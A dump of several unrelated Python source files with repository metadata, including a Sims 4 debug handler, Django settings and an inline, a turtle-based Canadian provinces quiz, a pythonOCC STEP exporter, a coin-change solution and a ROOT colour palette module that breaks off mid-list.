return makeHtmlString('html_templates:igr/premium-vehicle', 'name', {'vehicle': name})
return name
def checkForTags(vTags, tags):
if not hasattr(tags, '__iter__'):
tags = (tags,)
return bool(vTags & frozenset(tags))
def findVehicleArmorMinMax(vd):
def findComponentArmorMinMax(armor, minMax):
for value in armor:
if value != 0:
if minMax is None:
minMax = [value, value]
else:
minMax[0] = min(minMax[0], value)
minMax[1] = max(minMax[1], value)
return minMax
minMax = None
minMax = findComponentArmorMinMax(vd.hull.primaryArmor, minMax)
for turrets in vd.type.turrets:
for turret in turrets:
minMax = findComponentArmorMinMax(turret.primaryArmor, minMax)
return minMax
def _sortCrew(crewItems, crewRoles):
RO = Tankman.TANKMEN_ROLES_ORDER
return sorted(crewItems, cmp=lambda a, b: RO[crewRoles[a[0]][0]] - RO[crewRoles[b[0]][0]])
def getLobbyDescription(vehicle):
return text_styles.stats(i18n.makeString('#menu:header/level/%s' % vehicle.level)) + ' ' + text_styles.main(i18n.makeString('#menu:header/level', vTypeName=getTypeUserName(vehicle.type, vehicle.isElite)))
def getOrderByVehicleClass(className=None):
if className and className in VEHICLE_BATTLE_TYPES_ORDER_INDICES:
result = VEHICLE_BATTLE_TYPES_ORDER_INDICES[className]
else:
result = UNKNOWN_VEHICLE_CLASS_ORDER
return result
def getVehicleClassTag(tags):
subSet = vehicles.VEHICLE_CLASS_TAGS & tags
result = None
if subSet:
result = list(subSet).pop()
return result
_VEHICLE_STATE_TO_ICON = {Vehicle.VEHICLE_STATE.BATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_BATTLE,
Vehicle.VEHICLE_STATE.IN_PREBATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_INPREBATTLE,
Vehicle.VEHICLE_STATE.DAMAGED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.DESTROYED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.CREW_NOT_FULL: RES_ICONS.MAPS_ICONS_VEHICLESTATES_CREWNOTFULL,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTALISOVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.GROUP_IS_NOT_READY: RES_ICONS.MAPS_ICONS_VEHICLESTATES_GROUP_IS_NOT_READY}
def getVehicleStateIcon(vState):
if vState in _VEHICLE_STATE_TO_ICON:
icon = _VEHICLE_STATE_TO_ICON[vState]
else:
icon = ''
return icon
def getBattlesLeft(vehicle):
return i18n.makeString('#menu:infinitySymbol') if vehicle.isInfiniteRotationGroup else str(vehicle.rotationBattlesLeft)
| [
"[email protected]"
] | |
62cfb6b503b6ce9ea99f372bcf8a13687c42dca9 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/conditional_layers/conditional_layer_handlers.py | 9f92448745a071c4aac20c994e6eed081d12f54c | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,967 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\conditional_layers\conditional_layer_handlers.py
# Compiled at: 2018-05-11 22:46:41
# Size of source mod 2**32: 5273 bytes
from gsi_handlers.gameplay_archiver import GameplayArchiver
from sims4.gsi.dispatcher import GsiHandler
from sims4.gsi.schema import GsiGridSchema, GsiFieldVisualizers
import date_and_time, enum, services
conditional_layer_service_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Service')
conditional_layer_service_schema.add_field('conditional_layer', label='Class Name', width=1, unique_field=True)
conditional_layer_service_schema.add_field('layer_hash', label='Layer Name', width=1)
conditional_layer_service_schema.add_field('objects_created', label='Objects Created', width=1)
conditional_layer_service_schema.add_field('requests_waiting', label='Requests Waiting', width=1)
conditional_layer_service_schema.add_field('last_request', label='Last Request', width=1)
with conditional_layer_service_schema.add_has_many('Objects', GsiGridSchema) as (sub_schema):
sub_schema.add_field('object_id', label='Object Id')
sub_schema.add_field('object', label='Object')
with conditional_layer_service_schema.add_has_many('Requests', GsiGridSchema) as (sub_schema):
sub_schema.add_field('request', label='Request')
sub_schema.add_field('speed', label='Speed')
sub_schema.add_field('timer_interval', label='Timer Interval')
sub_schema.add_field('timer_object_count', label='Timer Object Count')
@GsiHandler('conditional_layer_service', conditional_layer_service_schema)
def generate_conditional_layer_service_data(zone_id: int=None):
layer_data = []
conditional_layer_service = services.conditional_layer_service()
if conditional_layer_service is None:
return layer_data
object_manager = services.object_manager()
for conditional_layer, layer_info in conditional_layer_service._layer_infos.items():
object_data = []
for object_id in layer_info.objects_loaded:
obj = object_manager.get(object_id)
object_data.append({'object_id':str(object_id),
'object':str(obj)})
request_data = []
for request in conditional_layer_service.requests:
if request.conditional_layer is conditional_layer:
request_data.append({'request':str(request),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count)})
layer_data.append({'layer_hash':str(conditional_layer.layer_name),
'conditional_layer':str(conditional_layer),
'objects_created':str(len(layer_info.objects_loaded)),
'requests_waiting':str(len(request_data)),
'last_request':str(layer_info.last_request_type),
'Objects':object_data,
'Requests':request_data})
return layer_data
class LayerRequestAction(enum.Int, export=False):
SUBMITTED = ...
EXECUTING = ...
COMPLETED = ...
conditional_layer_request_archive_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Request Archive', sim_specific=False)
conditional_layer_request_archive_schema.add_field('game_time', label='Game/Sim Time', type=(GsiFieldVisualizers.TIME))
conditional_layer_request_archive_schema.add_field('request', label='Request')
conditional_layer_request_archive_schema.add_field('action', label='Action')
conditional_layer_request_archive_schema.add_field('layer_hash', label='Layer Hash')
conditional_layer_request_archive_schema.add_field('speed', label='Speed')
conditional_layer_request_archive_schema.add_field('timer_interval', label='Timer Interval')
conditional_layer_request_archive_schema.add_field('timer_object_count', label='Timer Object Count')
conditional_layer_request_archive_schema.add_field('objects_in_layer_count', label='Object Count')
archiver = GameplayArchiver('conditional_layer_requests', conditional_layer_request_archive_schema,
add_to_archive_enable_functions=True)
def is_archive_enabled():
return archiver.enabled
def archive_layer_request_culling(request, action, objects_in_layer_count=None):
time_service = services.time_service()
if time_service.sim_timeline is None:
time = 'zone not running'
else:
time = time_service.sim_now
entry = {'game_type':str(time), 'request':str(request),
'action':action.name,
'layer_hash':str(hex(request.conditional_layer.layer_name)),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count),
'objects_in_layer_count':str(objects_in_layer_count) if objects_in_layer_count else ''}
archiver.archive(entry) | [
"[email protected]"
] | |
78de7289058ba6cd0376717e3c054543a4765a6e | dda618067f13657f1afd04c94200711c1920ea5f | /scoop/user/util/inlines.py | fae84630c7d38141cbccae33232c7d71bd188d6d | [] | no_license | artscoop/scoop | 831c59fbde94d7d4587f4e004f3581d685083c48 | 8cef6f6e89c1990e2b25f83e54e0c3481d83b6d7 | refs/heads/master | 2020-06-17T20:09:13.722360 | 2017-07-12T01:25:20 | 2017-07-12T01:25:20 | 74,974,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # coding: utf-8
from django_inlines import inlines
from django_inlines.inlines import TemplateInline
from scoop.user.models import User
class UserInline(TemplateInline):
"""
Inline d'insertion d'utilisateur
Format : {{user id [style=link|etc.]}}
Exemple : {{user 2490 style="link"}}
"""
inline_args = [{'name': 'style'}]
def get_context(self):
""" Renvoyer le contexte d'affichage du template """
identifier = self.value
style = self.kwargs.get('style', 'link')
# Vérifier que l'utilisateur demandé existe
user = User.objects.get_or_none(id=identifier)
return {'user': user, 'style': style}
def get_template_name(self):
""" Renvoyer le chemin du template """
base = super(UserInline, self).get_template_name()[0]
path = "user/%s" % base
return path
# Enregistrer les classes d'inlines
inlines.registry.register('user', UserInline)
| [
"[email protected]"
] | |
c387bf8145f4fb230a3446850b2101b88050201a | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/uz4.py | eb498670c22bbeea754028188e9d8126364e9394 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'uZ4':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
3f56e0b32438cf0782e92e5ea2de9f3379161e3d | 679cbcaa1a48c7ec9a4f38fa42d2dc06d7e7b6ef | /main.py | d5f2cef309384ff826e8e3934d2f1a1e69578595 | [] | no_license | roblivesinottawa/canada_provinces_game | cb2242845e3dd3a3902c0f416ac1a4efa485aecf | 2aa5c7236c2ac7381522b493fddf415ece9c3a87 | refs/heads/main | 2023-03-04T08:08:31.409489 | 2021-02-17T21:46:18 | 2021-02-17T21:46:18 | 339,863,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | import turtle
import pandas
screen = turtle.Screen()
screen.title("Canada Provinces Game")
image = "canada_map.gif"
screen.addshape(image)
turtle.shape(image)
data = pandas.read_csv("canada_provinces.csv")
all_provinces = data.province.to_list()
guessed = []
while len(guessed) < 50:
answer = screen.textinput(title=f"{len(guessed)} / 12 Provinces Correct",
prompt="What's another provinces's name? ").title()
if answer == "Exit":
missing = []
for province in all_provinces:
if province not in guessed:
missing.append(province)
new_data = pandas.DataFrame(missing)
new_data.to_csv("provinces_to_learn.csv")
break
if answer in all_provinces:
guessed.append(guessed)
t = turtle.Turtle()
t.hideturtle()
t.penup()
province_data = data[data.province == answer]
t.goto(float(province_data.x), float(province_data.y))
t.write(answer)
# turtle.mainloop() | [
"[email protected]"
] | |
6605d4e27c4cb4a040af60508ae4e17b5382aed8 | f594560136416be39c32d5ad24dc976aa2cf3674 | /mmdet/core/bbox/samplers/__init__.py | f58505b59dca744e489328a39fdabb02a893fb51 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | ShiqiYu/libfacedetection.train | bd9eb472c2599cbcb2f028fe7b51294e76868432 | dce01651d44d2880bcbf4e296ad5ef383a5a611e | refs/heads/master | 2023-07-14T02:37:02.517740 | 2023-06-12T07:42:00 | 2023-06-12T07:42:00 | 245,094,849 | 732 | 206 | Apache-2.0 | 2023-06-12T07:42:01 | 2020-03-05T07:19:23 | Python | UTF-8 | Python | false | false | 827 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .base_sampler import BaseSampler
from .combined_sampler import CombinedSampler
from .instance_balanced_pos_sampler import InstanceBalancedPosSampler
from .iou_balanced_neg_sampler import IoUBalancedNegSampler
from .mask_pseudo_sampler import MaskPseudoSampler
from .mask_sampling_result import MaskSamplingResult
from .ohem_sampler import OHEMSampler
from .pseudo_sampler import PseudoSampler
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from .score_hlr_sampler import ScoreHLRSampler
__all__ = [
'BaseSampler', 'PseudoSampler', 'RandomSampler',
'InstanceBalancedPosSampler', 'IoUBalancedNegSampler', 'CombinedSampler',
'OHEMSampler', 'SamplingResult', 'ScoreHLRSampler', 'MaskPseudoSampler',
'MaskSamplingResult'
]
| [
"[email protected]"
] | |
95bd533c71288b3f5335ed21e13942f5d7a24460 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03501/s994611067.py | 15296b32c0316cdc8748c1ea5d5ad1e71546c200 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | n,a,b=map(int,raw_input().split())
if a*n <b:
print a*n
else:
print b | [
"[email protected]"
] | |
78a54771d395abae7a5403a3cdbd6b176f71da9e | d4252920cf72df6973c31dad81aacd5d9ad6d4c6 | /core_example/core_export_with_name.py | 52b36666b3edfbf02e3adaec01909a7214c30acb | [] | no_license | tnakaicode/GeomSurf | e1894acf41d09900906c8d993bb39e935e582541 | 4481180607e0854328ec2cca1a33158a4d67339a | refs/heads/master | 2023-04-08T15:23:22.513937 | 2023-03-20T04:56:19 | 2023-03-20T04:56:19 | 217,652,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,697 | py | import numpy as np
import sys
import time
import os
from OCC.Display.SimpleGui import init_display
from OCC.Core.gp import gp_Pnt
from OCC.Core.XSControl import XSControl_Writer, XSControl_WorkSession
from OCC.Core.XCAFApp import XCAFApp_Application
from OCC.Core.XCAFDoc import XCAFDoc_DocumentTool_ShapeTool
from OCC.Core.STEPCAFControl import STEPCAFControl_Writer
from OCC.Core.STEPControl import STEPControl_Writer, STEPControl_Reader
from OCC.Core.STEPControl import STEPControl_AsIs
from OCC.Core.Interface import Interface_Static_SetCVal
from OCC.Core.IFSelect import IFSelect_RetDone
from OCC.Core.TDF import TDF_LabelSequence, TDF_Label, TDF_Tool, TDF_Data
from OCC.Core.TDocStd import TDocStd_Document
from OCC.Core.TDataStd import TDataStd_Name, TDataStd_Name_GetID
from OCC.Core.TCollection import TCollection_AsciiString
from OCC.Core.TCollection import TCollection_ExtendedString
from OCC.Core.BRepPrimAPI import BRepPrimAPI_MakeBox
from OCC.Extend.DataExchange import write_step_file, read_step_file
from OCC.Extend.DataExchange import read_step_file_with_names_colors
from OCCUtils.Construct import make_plane, make_vertex, make_circle
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_collection___extended_string.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_x_c_a_f_app___application.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_doc_std___document.html
class ExportCAFMethod (object):
def __init__(self, name="name", tol=1.0E-10):
self.name = name
self.writer = STEPCAFControl_Writer()
self.writer.SetNameMode(True)
self.doc = TDocStd_Document(
TCollection_ExtendedString("pythonocc-doc"))
#self.x_app = XCAFApp_Application.GetApplication()
# self.x_app.NewDocument(
# TCollection_ExtendedString("MDTV-CAF"), self.doc)
self.shape_tool = XCAFDoc_DocumentTool_ShapeTool(self.doc.Main())
Interface_Static_SetCVal("write.step.schema", "AP214")
def Add(self, shape, name="name"):
"""
STEPControl_AsIs translates an Open CASCADE shape to its highest possible STEP representation.
STEPControl_ManifoldSolidBrep translates an Open CASCADE shape to a STEP manifold_solid_brep or brep_with_voids entity.
STEPControl_FacetedBrep translates an Open CASCADE shape into a STEP faceted_brep entity.
STEPControl_ShellBasedSurfaceModel translates an Open CASCADE shape into a STEP shell_based_surface_model entity.
STEPControl_GeometricCurveSet translates an Open CASCADE shape into a STEP geometric_curve_set entity.
"""
label = self.shape_tool.AddShape(shape)
self.writer.Transfer(self.doc, STEPControl_AsIs)
def Write(self, filename=None):
if not filename:
filename = self.name
path, ext = os.path.splitext(filename)
if not ext:
ext = ".stp"
status = self.writer.Write(path + ext)
assert(status == IFSelect_RetDone)
if __name__ == "__main__":
display, start_display, add_menu, add_function_to_menu = init_display()
display.DisplayShape(gp_Pnt())
root = ExportCAFMethod(name="root")
root.Add(make_vertex(gp_Pnt()), name="pnt")
root.Add(make_plane(center=gp_Pnt(0, 0, 0)), name="pln0")
root.Add(make_plane(center=gp_Pnt(0, 0, 100)), name="pln1")
root.Add(make_circle(gp_Pnt(0, 0, 0), 100), name="circle")
root.Write()
display.FitAll()
box = BRepPrimAPI_MakeBox(10, 10, 10).Solid()
writer = STEPControl_Writer()
fp = writer.WS().TransferWriter().FinderProcess()
print(fp)
# start_display()
| [
"[email protected]"
] | |
c116261efdbfd8e7028b91803627518d781d088c | d7d2712ed98c748fda35c47c8f6ae21ea1d3b421 | /users/settings.py | 30b0ed03d895aee405e289d97f99c6386f3b049e | [] | no_license | kamral/user_models | 5bdd4bd5583b075cfef70a2b7be229575518ad97 | b75c6441be9ed51268f1370051eab3aa572ed228 | refs/heads/main | 2023-01-14T20:38:10.342545 | 2020-11-30T12:32:34 | 2020-11-30T12:32:34 | 317,218,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,232 | py | """
Django settings for users project.
Generated by 'django-admin startproject' using Django 2.2.13.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*6p%-fe7t_=nq^sar=twz!0!9how%x)a743e97!217-(!@0ilb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users_app'
]
AUTH_USER_MODEL='users_app.User'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'users.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'users.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'db_models',
'HOST':'127.0.0.1',
'PORT':'5432',
'PASSWORD':'password',
'USER':'users_top'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
f8f06cef7eb7f8000f785ce17005caaadfb5e2b9 | 7241ebc05ce727585224b3a98b0824f99e63627d | /tool/parser/JsonParser.py | d6539c8d86cf5900ad1f23f9402586f492b77105 | [] | no_license | mabenteng/ai-kg-neo4j | ca0cc161244229821e3b89e516fb616828823609 | 713e978ffedda7986245307cace02fb7ec240acd | refs/heads/master | 2021-10-20T03:50:43.583436 | 2019-02-25T14:25:11 | 2019-02-25T14:25:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,037 | py | # -*- coding: utf-8 -*-
# coding=utf-8
"""
create_author : zhangcl
create_time : 2018-07-01
program : *_* parse the parameter and generate cypher *_*
"""
import json
class JsonParser:
"""
Parser of request parameter.
"""
def __init__(self):
"""
initialize local variables.
"""
self.jsondata = None
self.result = {}
def parseJson(self, queryparam):
"""
Parse the parameter string to json object .
:param queryparam: json string
The json object holds the detail of request all infomation.
"""
self.querystring = queryparam
flag = True
try:
self.jsondata = json.loads(queryparam)
self.result['code'] = 200
self.result['message'] = 'sucess'
except Exception as err:
flag = False
print err
self.result['code'] = 500
self.result['message'] = err.message
self.result['data'] = ''
return flag
| [
"[email protected]"
] | |
bcc9f50e79bc76fc958fb5af4610f1cf265ea29f | a2dc75a80398dee58c49fa00759ac99cfefeea36 | /bluebottle/projects/migrations/0087_merge_20190130_1355.py | 705027f9fe948f888b16eb0437a1f45584ffd9db | [
"BSD-2-Clause"
] | permissive | onepercentclub/bluebottle | e38b0df2218772adf9febb8c6e25a2937889acc0 | 2b5f3562584137c8c9f5392265db1ab8ee8acf75 | refs/heads/master | 2023-08-29T14:01:50.565314 | 2023-08-24T11:18:58 | 2023-08-24T11:18:58 | 13,149,527 | 15 | 9 | BSD-3-Clause | 2023-09-13T10:46:20 | 2013-09-27T12:09:13 | Python | UTF-8 | Python | false | false | 341 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-01-30 12:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0086_auto_20190117_1007'),
('projects', '0086_merge_20190121_1425'),
]
operations = [
]
| [
"[email protected]"
] | |
7023e5ecdc00bc0113342ae94985d9d03e3efcba | afc693a1095f99cc586770fbd5a65dd40f2d822f | /docs/conf.py | 82c0e03d8f2804c1c403a6bc1943dfa63271cb9d | [
"LicenseRef-scancode-homebrewed",
"Beerware"
] | permissive | ndkoch/ihatemoney | 974f3b75d3bc2519d3c17f492d221da9fa780236 | 51bc76ecc5e310602216fb8eaa2ede2ab43b3d00 | refs/heads/master | 2020-09-27T00:03:31.320035 | 2019-12-09T00:19:22 | 2019-12-09T00:19:22 | 226,371,920 | 0 | 2 | NOASSERTION | 2019-12-09T00:19:23 | 2019-12-06T16:48:41 | Python | UTF-8 | Python | false | false | 266 | py | # coding: utf8
import sys, os
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "I hate money"
copyright = "2011, The 'I hate money' team"
version = "1.0"
release = "1.0"
exclude_patterns = ["_build"]
pygments_style = "sphinx"
| [
"[email protected]"
] | |
a138938f68658430a7186f241fa868fec2590e61 | 865bd5e42a4299f78c5e23b5db2bdba2d848ab1d | /Python/322.coin-change.135397822.ac.python3.py | 5e9a0619060981526f9753a831b848d95c17ab70 | [] | no_license | zhiymatt/Leetcode | 53f02834fc636bfe559393e9d98c2202b52528e1 | 3a965faee2c9b0ae507991b4d9b81ed0e4912f05 | refs/heads/master | 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | #
# [322] Coin Change
#
# https://leetcode.com/problems/coin-change/description/
#
# algorithms
# Medium (26.58%)
# Total Accepted: 92.2K
# Total Submissions: 346.9K
# Testcase Example: '[1]\n0'
#
#
# You are given coins of different denominations and a total amount of money
# amount. Write a function to compute the fewest number of coins that you need
# to make up that amount. If that amount of money cannot be made up by any
# combination of the coins, return -1.
#
#
#
# Example 1:
# coins = [1, 2, 5], amount = 11
# return 3 (11 = 5 + 5 + 1)
#
#
#
# Example 2:
# coins = [2], amount = 3
# return -1.
#
#
#
# Note:
# You may assume that you have an infinite number of each kind of coin.
#
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
class Solution:
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
MAX = float('inf')
dp = [0] + [MAX] * amount
for i in range(1, amount + 1):
dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1
return [dp[amount], -1][dp[amount] == MAX]
| [
"[email protected]"
] | |
59ec3812dd12a3af309dfdcc37161df0ee23d29f | 2e89ff0a41c5ae40bc420e5d298504927ceed010 | /anything/users/migrations/0001_initial.py | fdaae19b9ff03d88bd74ac05938ab739e8e817a4 | [] | no_license | darkblank/anything | 6dc676b7a099ddfce0c511db9234715a4f0ca66c | 17589f8988ed1cb6fa049962bfd3fbe57c392fba | refs/heads/master | 2020-03-11T09:40:32.608171 | 2018-05-12T09:20:27 | 2018-05-12T09:20:27 | 129,918,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | # Generated by Django 2.0.3 on 2018-05-11 23:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('nickname', models.CharField(max_length=20)),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
] | |
615bcc7e7e8afc56a8dc513da89e9d4f4faab88d | 83f78318d1a85045b0e29f3fed10e8ba3e5c107c | /throwback/root.py | a5a39de95633bd252ed2a43ca57c8e352c04ff32 | [] | no_license | kadrlica/throwback | c396d00230ec0e6ed4ce8c31ac6cd12e2ee76690 | c628acb9716aad433c49de4e2f71c54d2a0bc83e | refs/heads/master | 2020-03-24T09:33:03.127648 | 2018-08-02T15:04:00 | 2018-08-02T15:04:00 | 142,631,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,349 | py | #!/usr/bin/env python
"""
Generic python script.
"""
__author__ = "Alex Drlica-Wagner"
import matplotlib
from collections import OrderedDict as odict
# A modern version (v6-14-02) of the Palette from TColor...
# https://github.com/root-project/root/blob/2762a32343f57664b42558cd3af4031fe2f4f086/core/base/src/TColor.cxx#L2404-L2408
PALETTE = [19,18,17,16,15,14,13,12,11,20,
21,22,23,24,25,26,27,28,29,30, 8,
31,32,33,34,35,36,37,38,39,40, 9,
41,42,43,44,45,47,48,49,46,50, 2,
7, 6, 5, 4, 3, 2,1]
#7, 6, 5, 4, 3, 112,1] # original with typo
#7, 6, 5, 4, 3, 5,1] # corrected to match
# Going back in time to 2007 (v5-17-06), here was the origin palette
# Note the typo in entry 48: 112 (pink) not 2 (red)
# https://github.com/root-project/root/blob/9294cc60a9a70dece4f24f0bc0399cc00c0f78b5/base/src/TStyle.cxx#L1445-L1449
# The commit of the fix:
# https://github.com/root-project/root/commit/d3e92e5de7e76c1ded2af7218adc9bc20b7f0c9f
PALETTE07 = list(PALETTE)
PALETTE07[-2] = 5 # typo was 112, but end up being magenta
# These are the basic root colors.
# https://github.com/root-project/root/blob/2762a32343f57664b42558cd3af4031fe2f4f086/core/base/src/TColor.cxx#L1077
# This list was generated with:
# for (int i=1; i<51; i++) {gROOT->GetColor()->Print; }
TCOLORS = [
(1.000000, 1.000000, 1.000000), # Name=background
(0.000000, 0.000000, 0.000000), # Name=black
(1.000000, 0.000000, 0.000000), # Name=red
(0.000000, 1.000000, 0.000000), # Name=green
(0.000000, 0.000000, 1.000000), # Name=blue
(1.000000, 0.000000, 1.000000), # Name=magenta
(0.000000, 1.000000, 0.800000), # Name=teal
(1.000000, 0.800000, 0.000000), # Name=orange
(0.350000, 0.830000, 0.330000), # Name=Color8
(0.350000, 0.330000, 0.850000), # Name=Color9
(0.999000, 0.999000, 0.999000), # Name=white
(0.754000, 0.715000, 0.676000), # Name=editcol
(0.300000, 0.300000, 0.300000), # Name=grey12
(0.400000, 0.400000, 0.400000), # Name=grey13
(0.500000, 0.500000, 0.500000), # Name=grey14
(0.600000, 0.600000, 0.600000), # Name=grey15
(0.700000, 0.700000, 0.700000), # Name=grey16
(0.800000, 0.800000, 0.800000), # Name=grey17
(0.900000, 0.900000, 0.900000), # Name=grey18
(0.950000, 0.950000, 0.950000), # Name=grey19
(0.800000, 0.780000, 0.670000), # Name=Color20
(0.800000, 0.780000, 0.670000), # Name=Color21
(0.760000, 0.750000, 0.660000), # Name=Color22
(0.730000, 0.710000, 0.640000), # Name=Color23
(0.700000, 0.650000, 0.590000), # Name=Color24
(0.720000, 0.640000, 0.610000), # Name=Color25
(0.680000, 0.600000, 0.550000), # Name=Color26
(0.610000, 0.560000, 0.510000), # Name=Color27
(0.530000, 0.400000, 0.340000), # Name=Color28
(0.690000, 0.810000, 0.780000), # Name=Color29
(0.520000, 0.760000, 0.640000), # Name=Color30
(0.540000, 0.660000, 0.630000), # Name=Color31
(0.510000, 0.620000, 0.550000), # Name=Color32
(0.680000, 0.740000, 0.780000), # Name=Color33
(0.480000, 0.560000, 0.600000), # Name=Color34
